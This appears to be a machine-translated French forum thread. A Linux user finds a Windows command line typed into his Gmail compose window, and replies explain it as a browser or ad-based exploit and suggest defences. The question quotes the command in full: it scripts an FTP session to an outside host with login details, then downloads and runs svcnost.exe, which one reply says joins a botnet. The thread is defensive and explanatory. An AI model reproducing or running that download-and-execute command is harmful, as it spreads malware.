Comment identifier si mon ordinateur Linux a été piraté?

Mon ordinateur personnel est généralement allumé, mais le moniteur est éteint. Ce soir, je suis rentré du travail à la maison et j'ai trouvé ce qui ressemblait à une tentative de piratage: dans mon navigateur, mon compte Gmail était ouvert (c'était moi), mais il était en mode composition avec les éléments suivants sur le TOterrain:

md / c echo open cCTeamFtp.yi.org 21 >> ik & echo utilisateur ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & exit echo Vous avez été propriétaire

Pour moi, cela ressemble à un code de ligne de commande Windows, et le mddébut du code, combiné au fait que Gmail était en mode de composition, indique clairement que quelqu'un a essayé d'exécuter une cmdcommande. Je suppose que j'ai eu de la chance de ne pas utiliser Windows sur ce PC, mais j'en ai d'autres. C'est la première fois que quelque chose comme ça m'est arrivé. Je ne suis pas un gourou de Linux et je n'exécutais aucun programme autre que Firefox à l'époque.

Je suis absolument sûr de ne pas avoir écrit cela, et personne d'autre n'était physiquement à mon ordinateur. De plus, j'ai récemment changé mon mot de passe Google (et tous mes autres mots de passe) en quelque chose comme: vMA8ogd7bvje ne pense donc pas que quelqu'un ait piraté mon compte Google.

Qu'est-ce qui vient de se passer? Comment faire pour que quelqu'un frappe sur mon ordinateur alors que ce n'est pas la vieille machine Windows de mamie qui exécute des logiciels malveillants depuis des années, mais une récente installation Ubuntu?

Mise à jour:
Permettez-moi d'aborder quelques points et questions:

• Je suis en Autriche, à la campagne. Mon routeur WLAN exécute WPA2 / PSK et un mot de passe moyen fort qui ne figure pas dans le dictionnaire. devrait être brute-force et moins de 50 mètres d'ici; il est peu probable qu'il ait été piraté.
• J'utilise un clavier filaire USB, donc encore une fois très peu probable que quelqu'un puisse être à portée de main pour le pirater.
• Je n'utilisais pas mon ordinateur à l'époque; c'était juste au ralenti à la maison pendant que j'étais au travail. C'est un PC nettop monté sur un moniteur, donc je l'éteins rarement.
• La machine n’a que deux mois, ne fonctionne que sous Ubuntu, et je n’utilise pas de logiciels étranges, ni de sites étranges. C'est principalement Stack Exchange, Gmail et les journaux. Pas de jeux. Ubuntu est prêt à se tenir à jour.
• Je ne suis au courant d'aucun service VNC en cours d'exécution; Je n'ai certainement pas installé ou activé un. Je n'ai pas non plus démarré d'autres serveurs. Je ne suis pas sûr si certains fonctionnent sous Ubuntu par défaut?
• Je connais toutes les adresses IP dans l'activité du compte Gmail. Je suis à peu près sûr que Google n'était pas une porte d'entrée.
• J'ai trouvé une visionneuse de fichiers journaux , mais je ne sais pas quoi chercher. Aidez-moi?

Ce que je veux vraiment savoir, c’est ce qui me rend mal à l’aise, c’est: comment une personne sur Internet peut-elle générer des frappes au clavier sur ma machine? Comment puis-je empêcher cela sans en être tout à fait couvert? Je ne suis pas un geek sous Linux, je suis un père qui bousille Windows depuis plus de 20 ans et qui en a marre. Et depuis plus de 18 ans que je suis en ligne, je n’ai personnellement jamais assisté à une tentative de piratage informatique, c’est donc nouveau pour moi.

Je doute que tu aies de quoi t'inquiéter. Il s'agissait probablement d'une attaque JavaScript qui tentait de télécharger un lecteur par téléchargement . Si cela vous inquiète, commencez à utiliser les modules complémentaires NoScript et AdBlock Plus Firefox.

Même en visitant des sites fiables, vous n’êtes pas en sécurité car ils utilisent du code JavaScript provenant d’annonceurs tiers et qui peut être malveillant.

Je l'ai attrapé et l'ai exécuté dans une machine virtuelle. Il a installé mirc et c’est le journal d’état ... http://pastebin.com/Mn85akMk

Il s’agit d’une attaque automatisée qui essaie de vous demander de télécharger mIRC et de vous associer à un botnet qui vous transformera en spambot ... La ma VM s’est jointe et a établi une connexion à plusieurs adresses distantes, dont l’une autoemail-119.west320.com.

Pour l'exécuter sous Windows 7, je devais accepter l'invite UAC et lui permettre d'accéder à travers le pare-feu.

Il semble y avoir des tonnes de rapports de cette commande exacte sur d'autres forums, et quelqu'un dit même qu'un fichier torrent a essayé de l'exécuter une fois le téléchargement terminé ... Je ne sais pas comment cela serait possible.

Je ne l'ai pas utilisé moi-même, mais il devrait pouvoir vous montrer les connexions réseau actuelles pour que vous puissiez voir si vous êtes connecté à quelque chose qui sort de la norme: http://netactview.sourceforge.net/download.html

Je suis d'accord avec @ jb48394 que c'est probablement un exploit JavaScript, comme tout le reste ces jours-ci.

Le fait qu’il ait tenté d’ouvrir une cmdfenêtre (voir le commentaire de @ torbengb ) et d’exécuter une commande malveillante, plutôt que de simplement télécharger le cheval de Troie discrètement en arrière-plan, laisse penser qu’il exploite une vulnérabilité dans Firefox qui lui permet d’entrer des frappes, pas exécuter le code.

Cela explique également pourquoi cet exploit, qui était clairement écrit exclusivement pour Windows, fonctionnerait également sous Linux: Firefox exécute JavaScript de la même manière dans tous les systèmes d'exploitation (du moins, il essaye de :)) . Si cela était dû à un dépassement de tampon ou à un exploit similaire destiné à Windows, le programme aurait été bloqué.

En ce qui concerne l’origine du code JavaScript, il s’agit probablement d’une annonce Google malveillante (les annonces circulent dans Gmail toute la journée) . Il ne serait pas être la première fois .

J'ai trouvé une attaque similaire sur une autre machine Linux. Il semble que ce soit une sorte de commande FTP pour Windows.

Cela ne répond pas à l'ensemble de votre question, mais dans le fichier journal, recherchez les tentatives de connexion infructueuses.

S'il y a plus de cinq tentatives infructueuses dans votre journal, quelqu'un essaie de craquer root. Si rootvous avez réussi à vous connecter alors que vous étiez loin de votre ordinateur, CHANGEZ VOTRE MOT DE PASSE IMMÉDIATEMENT !! Je veux dire maintenant! De préférence à quelque chose alphanumérique, et environ 10 caractères de long.

Avec les messages que vous avez reçus (les echocommandes), cela ressemble vraiment à un script immature . Si c’était un véritable pirate informatique qui savait ce qu’il faisait, vous ne le sauriez probablement pas encore.

whois rapports west320.com appartient à Microsoft.

UPnP et Vino (Système -> Préférences -> Bureau à distance) associés à un mot de passe Ubuntu faible?

Avez-vous utilisé des référentiels non standard?

Le DEF CON organise chaque année un concours Wi-Fi pour déterminer à quelle distance un point d’accès Wi-Fi peut être atteint - la dernière fois que j’ai entendu dire que c’était 250 milles.

Si vous voulez vraiment avoir peur, regardez les captures d'écran du centre de contrôle-commande d'un réseau de zombies Zeus . Aucune machine n'est sûre, mais Firefox sous Linux est plus sûr que les autres. Mieux encore, si vous utilisez SELinux .